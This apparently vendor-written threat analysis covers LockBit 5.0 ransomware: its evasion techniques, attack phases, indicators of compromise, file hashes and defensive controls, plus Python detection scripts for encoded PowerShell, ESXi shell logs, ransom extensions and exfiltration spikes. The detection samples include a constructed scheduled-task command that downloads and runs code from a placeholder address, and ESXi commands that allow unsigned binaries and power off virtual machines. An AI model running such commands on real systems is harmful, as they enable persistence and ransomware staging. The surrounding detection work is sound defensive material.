LockBit 5.0 Ransomware: Technical Analysis, TTPs, and Defensive Guidance


LockBit 5.0 is the latest iteration of one of the most active ransomware operations on record. Released in September 2025, it arrived less than two years after a coordinated international law enforcement action, Operation Cronos, that dismantled significant portions of the LockBit group's infrastructure. The speed of that recovery, and the technical maturity of the new version, make LockBit 5.0 a credible and current threat to enterprises across nearly every sector.
This article provides a standalone technical and operational reference for incident response teams, MSPs, and security decision-makers. It covers the variant's capabilities, attack lifecycle, victimology, indicators of compromise, and a checklist of defensive controls directly tied to observed behavior.
LockBit ransomware history and evolution
LockBit first appeared in 2019 under the name ABCD, a reference to the .abcd extension the early variant appended to every file it encrypted. Over the following years it developed into one of the most active ransomware-as-a-service (RaaS) operations globally, releasing successive versions: LockBit 2.0 in 2021, which introduced StealBit for automated data theft, and LockBit 3.0, also known as LockBit Black, in 2022. At its peak, the group was responsible for a substantial share of global ransomware incidents.
In February 2024, Operation Cronos, a coordinated international law enforcement effort involving agencies across multiple countries, seized the group's infrastructure, exposed affiliates, and released decryption keys for victims. The disruption was significant but not permanent.
By early 2025, LockBit 4.0 had been released. LockBit 5.0, also known as "ChuongDong", followed in September 2025, with activity continuing into the current period. The pattern reflects a deliberate operational posture: rebuild infrastructure, improve tooling, and resume operations with enhanced capability.
LockBit 5.0 is a technically evolved platform that incorporates cross-platform support, improved defense evasion, and faster encryption.
Technical capabilities
LockBit 5.0 introduces several technical improvements over its predecessors that expand both its reach and its ability to evade detection. The variant is more modular than prior versions, with separate builds optimized for different operating environments, and incorporates stronger anti-analysis techniques that complicate forensic investigation and endpoint detection.
Cross-platform targeting
LockBit 5.0 ships as three builds: one for Windows workstations and servers, one for Linux servers, and one for VMware ESXi hypervisors. The group has also advertised compatibility with Proxmox, an open-source virtualization platform increasingly adopted by enterprises as an alternative to commercial hypervisors. This reach allows an affiliate to run a single campaign that hits endpoints, servers, and the virtual infrastructure underneath them at the same time, maximizing disruption while leaving fewer artifacts from which to reconstruct the intrusion afterward.
The Windows build is the most technically complex of the three. The Linux and ESXi builds are structurally similar, with the ESXi build adding functions aimed specifically at virtual machine management.
Encryption and defense evasion
All LockBit 5.0 variants use XChaCha20 (a stream cipher) together with Curve25519 (an elliptic-curve key exchange) for encryption, appending a randomized extension to each encrypted file. The ransom note format is consistent across all platforms.
The Windows sample applies multiple layers of defense evasion:
- Packing and DLL unhooking to remove the user-mode hooks that EDR products place in system libraries.
- Process hollowing to execute malicious code inside a legitimate process image.
- ETW patching, which disables Event Tracing for Windows inside the malware's own process. Specifically, it overwrites the start of the EtwEventWrite export in ntdll with a return instruction, so every ETW event the process would emit is dropped before it reaches a consumer. This is a user-mode change confined to one process: kernel-mode telemetry (driver callbacks, the Threat-Intelligence ETW provider) is unaffected, which is why EDR products that rely on kernel sources still observe the activity.
- Full event log clearing to remove forensic artifacts after execution.
- Reflective DLL loading for in-memory payload loading without writing to disk.
The malware terminates security-related services by comparing hashed service names against a hardcoded list of 63 values before encryption begins, systematically dismantling backup solutions, virtualization platforms, and critical business databases rather than performing generic process kills.
The Linux and ESXi variants are not packed, but nearly all strings within the binaries are encrypted, complicating static analysis and signature-based detection.
Infrastructure associated with the LockBit 5.0 data leak site has shown historical ties to SmokeLoader, a commodity malware loader, indicating possible infrastructure reuse or cooperative relationships with other threat actors.
RaaS model and affiliate structure
LockBit 5.0 continues operating as a ransomware-as-a-service cartel. Affiliates receive access to a custom payload builder, data leak site infrastructure, and negotiation support. The group manages its reputation actively and has established structured negotiation processes consistent with a business-like operational model.
Notably, the affiliate program explicitly permits attacks against critical infrastructure and medical facilities, placing legal responsibility on affiliates rather than the core operators. Attacks against organizations in the post-Soviet region are prohibited under affiliate terms, a restriction that has remained consistent across prior versions.
Attack lifecycle
LockBit 5.0 intrusions follow a structured, multi-phase progression from initial access to extortion. Each phase builds on the last, and the window for detection narrows considerably as the operation advances.
Understanding how affiliates move through these stages is essential for prioritizing controls and identifying where intervention is most likely to succeed.
Phase 1: Initial access
Phishing, vulnerability exploitation, and previously compromised credentials are the dominant initial access vectors across extortion incidents; phishing and exploitation each account for approximately 22% of cases according to the Unit 42 incident response report from 2026.
LockBit 5.0 affiliates use all three routes:
- Phishing campaigns have become more effective as AI-assisted tooling enables more credible, targeted lures.
- Vulnerability exploitation concentrates on widely deployed internet-facing systems where the effort required to weaponize a weakness is low relative to the access gained.
- Previously compromised credentials, obtained from prior breaches or underground markets, allow affiliates to authenticate directly into VPNs, remote access gateways, and cloud portals without triggering early detection.
Phase 2: Execution and persistence
Following initial access, affiliates establish persistence through PowerShell-based execution, scheduled tasks, and registry modifications. Living-off-the-land binaries (LOLBins), legitimate system tools repurposed for malicious use, are used extensively so that the activity blends into normal administrative traffic. Remote monitoring and management (RMM) tools, whether abused where already installed or deployed by the attacker, are also a recurring feature of ransomware operations consistent with LockBit affiliate tradecraft.
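PowerShell-based persistence of the kind described above usually arrives as an `-EncodedCommand` argument, so the scheduled-task or Run-key registration is invisible to a naive command-line match. The triage logic below is an added example written for this article, not code from the original page or from any LockBit sample analysis. It decodes the UTF-16LE base64 payload that PowerShell accepts for `-EncodedCommand` and its short forms, then scores the decoded text plus the raw command line against a small, assumed token list; the two process command lines it checks are constructed in the shape of Sysmon Event ID 1 data, not taken from a real incident.

```python
import base64
import re
from typing import Dict, Optional

# Tokens that, especially together with -EncodedCommand, point to persistence or
# staging rather than routine administration. Weights are additive; this list is
# a heuristic starting point chosen for the example, not a complete catalogue.
SUSPICIOUS_TOKENS = {
    "register-scheduledtask": 3,
    "schtasks": 3,
    "currentversion\\run": 3,       # Run-key persistence
    "new-itemproperty": 2,
    "downloadstring": 3,
    "invoke-webrequest": 2,
    "invoke-expression": 2,
    "iex ": 2,
    "-windowstyle hidden": 1,
    "-executionpolicy bypass": 1,
}

# -EncodedCommand and the abbreviations powershell.exe accepts for it (-e, -ec, -en, -enc).
ENC_FLAG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext of a -EncodedCommand argument (base64 of UTF-16LE), or
    None when the command line carries no such argument or it does not decode."""
    match = ENC_FLAG.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_command(cmdline: str) -> Dict:
    """Decode an encoded payload if present, then score the command line plus the
    decoded text against the token list. alert is True at score >= 5."""
    decoded = decode_encoded_command(cmdline)
    text = ((decoded or "") + " " + cmdline).lower()
    hits = sorted(t for t in SUSPICIOUS_TOKENS if t in text)
    score = sum(SUSPICIOUS_TOKENS[t] for t in hits)
    if decoded is not None:
        hits.insert(0, "-encodedcommand")   # the encoding itself is worth recording
        score += 2
    return {"decoded": decoded, "hits": hits, "score": score, "alert": score >= 5}


def encode_for_powershell(script: str) -> str:
    """Build the -EncodedCommand form of a script, as a dropper would. Used here
    only to construct the sample events below."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed samples in the shape of Sysmon Event ID 1 command lines; not from a
# real incident. 198.51.100.7 is a documentation address (TEST-NET-2).
PERSISTENCE_SCRIPT = (
    'Register-ScheduledTask -TaskName "OneDrive Update" -Action (New-ScheduledTaskAction '
    '-Execute powershell -Argument "-w hidden -c IEX (New-Object Net.WebClient)'
    ".DownloadString('http://198.51.100.7/u')\")"
)
SAMPLE_EVENTS = [
    "powershell.exe -nop -w hidden -enc " + encode_for_powershell(PERSISTENCE_SCRIPT),
    'powershell.exe -NoProfile -Command "Get-Service -Name Spooler"',
]

if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        result = score_command(event)
        print(result["alert"], result["score"], result["hits"])
```

Scoring the decoded text together with the outer command line matters because the two halves carry different signals: the outer line shows the window-hiding and profile-skipping switches, the decoded script shows what is actually being registered or downloaded. Run the same function over Security event 4688 or Sysmon 1 exports and tune the weights to the environment before turning it into an alert.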
Phase 3: Lateral movement and privilege escalation
Lateral movement proceeds via Server Message Block (SMB) and Remote Desktop Protocol (RDP) propagation, credential dumping, and token or session hijacking.
Identity weaknesses, including excessive permissions, over-scoped service accounts, and unretired legacy roles, consistently accelerate this phase.
In Unit 42 investigations, identity issues played a material role in nearly 90% of cases, turning an initial foothold into broad network access.
Phase 4: Data exfiltration
Pre-encryption data exfiltration is standard practice. Data theft featured in more than half of all extortion cases observed in 2025. Files are staged and transferred via cloud storage services, FTP/SFTP, or custom exfiltration channels. Exfiltration over web services (MITRE ATT&CK T1567) is the most prevalent observed technique.
The pace of this phase is accelerating. In 2025, the fastest quartile of intrusions reached exfiltration in approximately 72 minutes, a sharp reduction from roughly 285 minutes the prior year. Defenders cannot assume a multi-hour window for detection and intervention.
Phase 5: Encryption and extortion
After exfiltration, the ransomware payload deploys across all reachable systems. LockBit 5.0 uses double extortion: file encryption combined with the threat of leak site publication.
In 2025, encryption appeared in 78% of extortion cases, down from prior years, reflecting a broader shift toward data exposure as a standalone lever. Reporting indicates that some intrusions proceeded to extortion without file locking, relying entirely on the threat of data release to generate pressure.
Harassment tactics, including direct contact with employees or customers, are also observed in a subset of cases.
Targeting and victimology
LockBit 5.0 has recorded over 200 victims on its data leak site since December 2025, with activity continuing into early 2026. The primary target base is the U.S. private business sector, with the U.S., India, and Brazil identified as the principal geographic targets. The operation maintains a broader global footprint, with significant victim representation in Europe as well.
Industry distribution reflects the broader LockBit targeting pattern: healthcare, manufacturing, financial services, government agencies, and educational institutions are all represented.
The Health-ISAC has specifically flagged LockBit as among the most dangerous ransomware threats currently active against healthcare organizations. Healthcare environments face particularly acute risk given the combination of sensitive data, operational criticality, and historically uneven security controls.
Geographic and sector restrictions applied by the affiliate program shape targeting at the margins, but the practical effect remains a broadly opportunistic operation concentrated on organizations with identifiable weaknesses in identity controls, patch management, or endpoint visibility.
Indicators of compromise
The following IOC categories are consistent with LockBit 5.0 activity. Specific file hashes and IP addresses vary per campaign due to the affiliate customization model.
| IOC category | Details |
|---|---|
| Encrypted file extension | Randomized 16-character hexadecimal string appended to every encrypted file (pattern .[a-f0-9]{16}) |
| Ransom note | ReadMeForDecrypt.txt, consistent format across platforms; dropped across multiple directories post-encryption |
| PowerShell activity | Unusual execution chains; obfuscated or encoded scripts deployed at scale |
| RMM tool misuse | Unauthorized deployment or lateral use of remote management tools |
| ESXi admin commands | Unauthorized virtualization administration activity (MITRE ATT&CK T1675) |
| Outbound data spikes | Large transfers to web services prior to encryption (T1567) |
| C2 infrastructure | Tor-hosted onion domains; infrastructure with historical SmokeLoader associations |
| Log and ETW tampering | Cleared Windows event logs; EtwEventWrite patched in the ransomware process |
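On ESXi the "unauthorized virtualization administration" row above is concrete: the commands land in the host's shell log, and the sequence that precedes encryption (inventory the VMs, allow unsigned binaries, make a dropped file executable, power the guests off) is distinctive. The triage function below is an added example written for this article, not code from the original page or from any LockBit analysis. It assumes the `/var/log/shell.log` line format used by recent ESXi releases (`<timestamp> shell[<pid>]: [<user>]: <command>`), applies a small rule set whose weights are this example's own choice, and sums the weights per shell session; the log lines it runs on are constructed, not from a real host.

```python
import re
from collections import defaultdict
from typing import Dict, Iterable, List

# Assumed format of /var/log/shell.log on ESXi 7/8: "<ISO timestamp> shell[<pid>]: [<user>]: <command>".
SHELL_LOG_RE = re.compile(r"^(?P<ts>\S+) shell\[(?P<pid>\d+)\]: \[(?P<user>[^\]]+)\]: (?P<cmd>.*)$")

# (pattern, weight, description). Weights are a heuristic chosen for this example;
# the execInstalledOnly change and mass power-offs are the precursors that matter most.
RULES = [
    (re.compile(r"/User/execInstalledOnly\s+-i\s+0"), 4, "execInstalledOnly disabled: unsigned binaries may run"),
    (re.compile(r"vim-cmd\s+vmsvc/power\.off\b"), 3, "VM powered off via vim-cmd"),
    (re.compile(r"esxcli\s+vm\s+process\s+kill\b"), 3, "VM process force-killed via esxcli"),
    (re.compile(r"chmod\s+\+x\s+/tmp/"), 3, "file in /tmp made executable"),
    (re.compile(r"esxcli\s+system\s+syslog\b"), 2, "syslog configuration touched"),
    (re.compile(r"vim-cmd\s+vmsvc/getallvms\b|esxcli\s+vm\s+process\s+list\b"), 1, "VM inventory enumerated"),
]


def triage_shell_log(lines: Iterable[str], session_threshold: int = 5) -> Dict:
    """Parse shell.log lines, attach a weighted finding to each matching command, and
    sum weights per shell session (pid). Sessions at or above the threshold are the
    ones to escalate. Lines that do not parse are counted and skipped."""
    findings: List[Dict] = []
    session_scores: Dict[str, int] = defaultdict(int)
    unparsed = 0
    for line in lines:
        m = SHELL_LOG_RE.match(line.rstrip("\n"))
        if not m:
            unparsed += 1
            continue
        for pattern, weight, reason in RULES:
            if pattern.search(m["cmd"]):
                findings.append({"ts": m["ts"], "pid": m["pid"], "user": m["user"],
                                 "cmd": m["cmd"], "weight": weight, "reason": reason})
                session_scores[m["pid"]] += weight
    alert_sessions = sorted(pid for pid, s in session_scores.items() if s >= session_threshold)
    return {"findings": findings, "session_scores": dict(session_scores),
            "alert_sessions": alert_sessions, "unparsed": unparsed}


# Constructed shell.log lines, not from a real host. One benign admin session
# (pid 2090001) and one that walks the pre-encryption sequence (pid 2098756).
SAMPLE_SHELL_LOG = [
    "2025-09-20T09:02:11Z shell[2090001]: [root]: esxcli network ip interface list",
    "2025-09-20T10:15:32Z shell[2098756]: [root]: vim-cmd vmsvc/getallvms",
    "2025-09-20T10:15:40Z shell[2098756]: [root]: esxcli system settings advanced set -o /User/execInstalledOnly -i 0",
    "2025-09-20T10:15:51Z shell[2098756]: [root]: chmod +x /tmp/.x",
    "2025-09-20T10:16:02Z shell[2098756]: [root]: vim-cmd vmsvc/power.off 12",
    "2025-09-20T10:16:03Z shell[2098756]: [root]: vim-cmd vmsvc/power.off 13",
    "not a shell.log line",
]

if __name__ == "__main__":
    result = triage_shell_log(SAMPLE_SHELL_LOG)
    for finding in result["findings"]:
        print(finding["ts"], finding["pid"], finding["weight"], finding["reason"])
    print("escalate sessions:", result["alert_sessions"], "unparsed:", result["unparsed"])
```

Grouping by session rather than by line is what separates an administrator powering off one VM from an affiliate powering off all of them in seconds. Ship shell.log and hostd.log off the host over syslog before an incident; once the hypervisor is encrypted the local copy is gone, and the ransomware may also have touched the syslog configuration, which is why that rule is present.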
Known file hashes (SHA-256)
Windows variants:
- 7ea5afbc166c4e23498aa9747be81ceaf8dad90b8daa07a6e4644dc7c2277b82
- 180e93a091f8ab584a827da92c560c78f468c45f2539f73ab2deb308fb837b38
Linux variants:
- 4dc06ecee904b9165fa699b026045c1b6408cc7061df3d2a7bc2b7b4f0879f4d
- 90b06f07eb75045ea3d4ba6577afc9b58078eafeb2cdd417e2a88d7ccf0c0273
- 98d8c7870c8e99ca6c8c25bb9ef79f71c25912fbb65698a9a6f22709b8ad34b6
Security teams should treat unusual ESXi administrative commands and large pre-encryption outbound transfers as high-priority escalation signals, given LockBit 5.0's explicit cross-platform targeting and standard exfiltration-first workflow.
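Because the extension is random per file, a sweep for the encrypted-file pattern cannot match a fixed string; it has to match the shape (16 lowercase hex characters after the last dot) and correlate with the fixed ransom note name. The triage function below is an added example written for this article, not code from the original page or from any LockBit analysis. It takes any file listing (a `find` export, a backup index, EDR file events), counts matching files per directory, records directories holding ReadMeForDecrypt.txt, and only escalates a directory when the note is present or the count passes a threshold; the listing it runs on is constructed.

```python
import re
from collections import Counter
from pathlib import PurePosixPath, PureWindowsPath
from typing import Dict, Iterable, Tuple

RANSOM_NOTE = "ReadMeForDecrypt.txt"
# Extension shape reported for LockBit 5.0: a dot followed by 16 lowercase hex
# characters, at the very end of the file name.
RANDOM_HEX_EXT = re.compile(r"\.[a-f0-9]{16}$")


def _split(path: str) -> Tuple[str, str]:
    """Return (parent, name) for either path flavour; a listing may come from a
    Windows file-event export or from a POSIX find run on a Linux or ESXi host."""
    p = PureWindowsPath(path) if "\\" in path else PurePosixPath(path)
    return str(p.parent), p.name


def triage_listing(paths: Iterable[str], min_hits: int = 5) -> Dict:
    """Count, per directory, files carrying a 16-hex extension and record directories
    holding the ransom note. A directory is suspicious when it holds a note or when
    renamed files reach min_hits; the threshold keeps a lone odd filename from alerting."""
    renamed: Counter = Counter()
    note_dirs = set()
    for path in paths:
        parent, name = _split(path)
        if name == RANSOM_NOTE:
            note_dirs.add(parent)
        elif RANDOM_HEX_EXT.search(name):
            renamed[parent] += 1
    candidates = set(renamed) | note_dirs
    suspicious = sorted(d for d in candidates if renamed[d] >= min_hits or d in note_dirs)
    return {"renamed_by_dir": dict(renamed), "note_dirs": sorted(note_dirs), "suspicious_dirs": suspicious}


# Constructed listing, not from a real incident: one encrypted share with a note,
# one Windows profile holding only the note, one build cache with a single
# coincidental 16-hex name that must not alert on its own.
SAMPLE_LISTING = [
    "/srv/finance/q3-report.xlsx.3fa9c0d17be2481e",
    "/srv/finance/budget.docx.9e1b77a4c02d5f63",
    "/srv/finance/ledger.db.0b4c8e2f1a6d7953",
    "/srv/finance/payroll.csv.c7d2e9f0a1b34568",
    "/srv/finance/ReadMeForDecrypt.txt",
    "/srv/finance/notes.txt",
    r"C:\Users\alice\Documents\ReadMeForDecrypt.txt",
    "/home/dev/project/build/cache.1a2b3c4d5e6f7890",
    "/var/log/syslog",
]

if __name__ == "__main__":
    result = triage_listing(SAMPLE_LISTING)
    print("renamed per directory:", result["renamed_by_dir"])
    print("ransom notes in:", result["note_dirs"])
    print("escalate:", result["suspicious_dirs"])
```

The threshold is there because a 16-hex "extension" is not unique to ransomware (content-addressed caches produce similar names), whereas the note filename plus even a handful of renamed neighbours is. On a live host, feed the function the output of `find / -xdev -type f` and treat any hit as confirmation that encryption has already run; the higher-value signal from the paragraph above, the outbound transfer before it, is the one that still leaves room to intervene.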
Security checklist
The following controls map directly to LockBit 5.0's observed attack patterns. Each item addresses a specific phase or technique documented in this analysis.
- Deploy phishing-resistant MFA (FIDO2/passkeys) for all privileged accounts. Standard MFA is increasingly bypassed through adversary-in-the-middle and session hijacking techniques consistent with LockBit affiliate tradecraft.
- Audit and enforce least privilege across human and machine identities. Retire over-scoped roles, unmonitored service accounts, and legacy permissions: these are the pathways through which a foothold becomes a breach.
- Automate patching for internet-facing assets, targeting critical CVEs within 24 hours of disclosure. Evidence suggests attackers begin scanning for newly disclosed vulnerabilities within minutes of a CVE being announced.
- Isolate backups from production networks and test restoration regularly. In 26% of 2025 extortion cases, attackers targeted backup infrastructure. Isolated, tested backups are the primary recovery path that does not require negotiation.
- Monitor ESXi, Proxmox, and virtualization platforms for unauthorized administrative commands. LockBit 5.0 explicitly supports these environments, and affiliates deploy tooling specifically designed to exploit them.
- Deploy EDR/XDR with behavioral analytics capable of detecting process hollowing, DLL unhooking, and ETW patching, all techniques the Windows variant applies during execution.
- Alert on outbound data transfer anomalies before and independent of encryption. Data theft can generate extortion leverage without any encryption occurring.
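The exfiltration phase described earlier and the last checklist item both come down to the same detection: per-host outbound volume that breaks from that host's own history, judged before any encryption is seen. The function below is an added example written for this article, not code from the original page or from any vendor's product. It sums one hour of outbound flow records per host, excluding internal destinations so backups and replication neither mask nor mimic exfiltration, and compares the total against a robust baseline (median plus k times the median absolute deviation) built from that host's prior hours; the flow records and baselines are constructed, and the floor, k value and web-service port set are this example's own choices.

```python
import statistics
from collections import defaultdict
from typing import Dict, List, Tuple

MB = 1024 * 1024
WEB_SERVICE_PORTS = {80, 443}        # where cloud-storage exfiltration (T1567) lands
FLOOR_BYTES = 500 * MB               # never alert on an hour below this, whatever the baseline


def summarise_hour(flows: List[Dict]) -> Tuple[Dict[str, int], Dict[str, int]]:
    """Per-host outbound bytes for one hour, plus the portion sent to web-service
    ports. Flows to internal destinations (backups, replication) are excluded so
    they cannot mask or mimic exfiltration."""
    total: Dict[str, int] = defaultdict(int)
    web: Dict[str, int] = defaultdict(int)
    for f in flows:
        if f["dst_internal"]:
            continue
        total[f["host"]] += f["bytes_out"]
        if f["dst_port"] in WEB_SERVICE_PORTS:
            web[f["host"]] += f["bytes_out"]
    return total, web


def robust_threshold(history: List[int], k: float = 6.0) -> float:
    """Median plus k times the median absolute deviation. Median/MAD resists a
    baseline already polluted by one earlier spike. A flat history has MAD 0, so
    fall back to 10% of the median to leave a quiet host some headroom."""
    med = statistics.median(history)
    mad = statistics.median(abs(x - med) for x in history) or 0.1 * med
    return med + k * mad


def detect_exfil(baseline_hours: Dict[str, List[int]], flows: List[Dict], k: float = 6.0) -> List[Dict]:
    """baseline_hours maps host -> hourly outbound totals from prior days; flows is
    the hour under review. Hosts with no baseline are skipped here (they belong in a
    separate new-host review), as are hours under FLOOR_BYTES."""
    total, web = summarise_hour(flows)
    alerts = []
    for host, sent in sorted(total.items()):
        history = baseline_hours.get(host)
        if not history or sent < FLOOR_BYTES:
            continue
        threshold = robust_threshold(history, k)
        if sent > threshold:
            alerts.append({"host": host, "bytes_out": sent, "threshold": threshold,
                           "web_share": round(web[host] / sent, 2)})
    return alerts


# Constructed baselines (hourly outbound bytes on prior days) and one constructed
# hour of flow records; none of this is from a real network. fin-fs01 is a quiet
# file server, dev-ws17 a developer box that routinely pushes large builds.
BASELINE = {
    "fin-fs01": [40 * MB, 55 * MB, 48 * MB, 60 * MB, 52 * MB, 45 * MB, 58 * MB],
    "dev-ws17": [900 * MB, 1200 * MB, 1100 * MB, 950 * MB, 1300 * MB],
}
CURRENT_HOUR = [
    {"host": "fin-fs01", "dst": "203.0.113.10", "dst_port": 443, "bytes_out": 1800 * MB, "dst_internal": False},
    {"host": "fin-fs01", "dst": "10.0.0.5", "dst_port": 445, "bytes_out": 3000 * MB, "dst_internal": True},
    {"host": "dev-ws17", "dst": "203.0.113.20", "dst_port": 443, "bytes_out": 1250 * MB, "dst_internal": False},
    {"host": "hr-ws03", "dst": "203.0.113.30", "dst_port": 22, "bytes_out": 120 * MB, "dst_internal": False},
]

if __name__ == "__main__":
    for alert in detect_exfil(BASELINE, CURRENT_HOUR):
        print(f"{alert['host']}: {alert['bytes_out'] // MB} MiB out "
              f"(threshold {alert['threshold'] / MB:.0f} MiB, {alert['web_share']:.0%} to web services)")
```

The developer workstation sends more bytes than the file server in absolute terms yet does not alert, because the comparison is against each host's own history; the file server's 1.8 GiB hour, all of it to port 443, is roughly twenty times its threshold. That per-host framing is what makes the alert usable at the 72-minute pace the article cites: a global volume threshold is either noisy or blind, and a per-host one fires in the first hour.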
Understanding how to respond when an incident occurs, including isolation procedures, stakeholder notification, and evidence preservation, is as important as prevention.
Digital forensics investigation following a ransomware incident can establish the full scope of access, support insurance claims, and provide the evidence base for legal proceedings. Foundational security controls that close the gaps LockBit affiliates routinely exploit should be validated and documented before an incident, not after.



Approved by
Bogdan founded Proven Data in 2011 with a mission to help organizations recover from data loss and cyber incidents. Under his leadership, the company has grown from a data recovery lab into a nationally recognized cybersecurity firm handling thousands of incident response cases.


